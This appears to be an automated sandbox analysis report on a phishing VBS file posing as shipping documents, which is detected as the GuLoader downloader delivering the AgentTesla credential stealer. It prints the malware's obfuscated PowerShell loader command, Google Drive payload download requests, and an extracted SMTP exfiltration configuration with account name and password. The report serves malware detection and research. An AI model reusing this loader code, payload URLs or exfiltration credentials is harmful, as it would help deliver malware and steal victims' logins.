Windows Analysis Report
Shipping Dcuments_CI PKL_HL_.vbs

Overview

General Information

Sample name: Shipping Dcuments_CI PKL_HL_.vbs
Analysis ID: 1428354
MD5: 8e17d7f6a7a42733f0ff057dcd6e8be8
SHA1: 8fe0a41955cf840843da296ecf7b1a57b0a9dfa9
SHA256: 223d2f80a60223db2bcdf49cdafd000c7242bb7c3e87ff1a354697719483e68f
Tags: Formbookvbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Found malware configuration
Source: WmiPrvSE.exe.4004.2.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "antenna@myhydropowered.com", "Password": "jnKkQ2DFtjsDqGZ"}
Source: unknown HTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: Binary string: Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000007.00000002.2050424001.0000000002D40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071B6000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: ip-api.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000001.00000003.1485959953.0000024CD1079000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1485193301.0000024CD10A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608193930.0000024CD0FF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e148b3
Source: wscript.exe, 00000001.00000003.1486091804.0000024CD102D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD1055000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e14
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googPz
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BD61A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5P
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5XR
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2157807692.00000250BCFF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown HTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49717 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_1836.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6816, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: Initial file: aldous.ShellExecute Kirkemusiks,Stedfortraeder93,"","" ,Deceleron
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6670
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6670
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6670 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6670 Jump to behavior
Writes or reads registry keys via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- 